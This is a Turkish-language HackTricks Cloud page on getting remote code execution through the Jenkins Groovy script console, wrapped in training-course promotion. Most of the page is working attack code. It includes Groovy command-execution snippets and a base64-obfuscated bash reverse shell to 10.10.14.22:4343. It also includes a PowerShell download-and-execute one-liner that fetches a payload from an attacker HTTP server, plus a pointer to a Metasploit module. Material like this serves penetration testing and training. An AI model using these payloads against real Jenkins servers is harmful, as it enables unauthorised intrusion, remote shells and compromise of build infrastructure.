HackTricks CloudJenkins RCE with Groovy Script
Tip
AWS Hacking’i öğrenin ve pratik yapın:
HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın:HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking’i öğrenin ve pratik yapın:HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks'i Destekleyin
- Abonelik planlarını kontrol edin!
- Katılın 💬 Discord group veya telegram group veya Twitter’da bizi takip edin 🐦 @hacktricks_live.
- PR göndererek hacking tricks paylaşın: HackTricks ve HackTricks Cloud github repos.
Jenkins RCE with Groovy Script
Bu, Jenkins’te yeni bir proje oluşturmaktan daha az gürültülü.
- path_jenkins/script yoluna gidin.
- Metin kutusuna script’i ekleyin.
def process = "PowerShell.exe <WHATEVER>".execute()
println "Found text ${process.text}"
Bir komutu şu şekilde çalıştırabilirsiniz: cmd.exe /c dir
linux üzerinde şunu yapabilirsiniz: "ls /".execute().text
Metin içinde tırnak ve tek tırnak kullanmanız gerekiyorsa, yükü çalıştırmak için “”“PAYLOAD”“” (üçlü çift tırnak) kullanabilirsiniz.
Başka bir yararlı groovy script şudur ( [INSERT COMMAND] ile değiştirin):
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = '[INSERT COMMAND]'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
Linux’te Ters Shell
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMi80MzQzIDA+JjEnCg==}|{base64,-d}|{bash,-i}'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
Windows’ta Ters Shell
Bir PS ters shell ile HTTP sunucusu hazırlayabilir ve bunu indirmek ve çalıştırmak için Jeking kullanabilirsiniz:
scriptblock="iex (New-Object Net.WebClient).DownloadString('http://192.168.252.1:8000/payload')"
echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0
cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc <BASE64>
Script
Bu süreci bu script ile otomatikleştirebilirsiniz.
Bir ters shell almak için MSF kullanabilirsiniz:
msf> use exploit/multi/http/jenkins_script_console
Tip
AWS Hacking’i öğrenin ve pratik yapın:
GCP Hacking’i öğrenin ve pratik yapın:
Az Hacking’i öğrenin ve pratik yapın:HackTricks'i Destekleyin
- Abonelik planlarını kontrol edin!
- Katılın 💬 Discord group veya telegram group veya Twitter’da bizi takip edin 🐦 @hacktricks_live.
- PR göndererek hacking tricks paylaşın: HackTricks ve HackTricks Cloud github repos.